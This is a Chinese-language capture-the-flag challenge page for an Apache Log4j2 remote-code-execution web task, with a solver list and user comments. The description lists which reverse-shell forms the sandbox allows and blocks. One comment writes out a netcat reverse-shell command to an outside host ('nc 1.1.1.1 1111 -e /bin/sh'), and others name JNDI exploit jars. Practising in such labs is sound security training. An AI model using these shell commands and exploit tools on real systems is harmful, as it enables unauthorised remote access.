Apache Log4j2 RCEWEB 未解决
分数:
25
金币:
3
题目作者:
云牧青
一 血:
yeedo
一血奖励:
8金币
解 决:
521
提 示:
人太多了服务器性能有点满了,启动不起来的 过一会再启动就可以了。
描 述:
/bin/bash:x ;
/bin/sh √ ;
/dev/tcp × ;
nc -e x ;
nc a.cc 1234 -e √ ;
评分(6)
解题动态
hackerbugku 攻破了该题 1天前
450878859 攻破了该题 6天前
18940001335 攻破了该题 14天前
是大方子 攻破了该题 22天前
854396873 攻破了该题 1月前
KKsama 攻破了该题 1月前
JJJleo 攻破了该题 1月前
TTONya 攻破了该题 1月前
ZyonSec 攻破了该题 1月前
Ftcioer 攻破了该题 1月前
H0neeeeeeee 攻破了该题 1月前
雾島风起時 攻破了该题 2月前
tingsi464 攻破了该题 3月前
minshenyao 攻破了该题 4月前
tfios 攻破了该题 4月前
yanzhenfeng 攻破了该题 5月前
rookiee 攻破了该题 5月前
有手就行 攻破了该题 5月前
栩xu 攻破了该题 6月前
评论
daye8ku 25天前
举报
dnslog成功了,其余是真不行
KKsama 1月前
举报
白嫖阿里云服务器一年 https://university.aliyun.com/
TTONya 1月前
举报
注意几点 1. 题目说了不能用用bash,所以我们构造的payload不能有bash相关的命令,要全部换为sh 2. 同样的,题目说了-e选项要放到后面,所以这里同样也要放到后面,示例命令 nc 1.1.1.1 1111 -e /bin/sh 3. 注意攻击机的jdk版本,尽量使用java8,刚开始我用java17跑了好几遍没通 希望对大家有帮助
tingsi464 3月前
举报
不买个虚拟主机还真难搞这个
VFlame 4月前
举报
反弹shell不成功,用vps开JNDIExploit-1.2-SNAPSHOT.jar,JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,都没有反弹shell回来
lotuswhite 11月前
举报
不知道为什么,作者大大wp里的JNDIExploit-1.2-SNAPSHOT.jar反弹shell不成功,但是百度大佬wp里的JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar成功了。我的6金币呜呜
genius4282 1年前
举报
裂开,不如自己搭建个本地的复现效率高,同样的步骤,在这里就搞不了还麻烦
ctfliu 2年前
举报
不懂,跟着流程走的。阿里云开启虚拟linux,在安全组规则放开所有端口。根据别人的wp走就行。
xiaopengy 2年前
举报
请问反弹shell的时候vps端为什么报这个错? 我的vps机是kali的系统。 java.lang.IllegalAccessError: superclass access check failed: class com.feihong.ldap.template.TomcatEchoTemplate (in unnamed module @0x5e91993f) cannot access
Striker123456 2年前
举报
弹回的shell执行不了命令,不知道是不是我的服务器的问题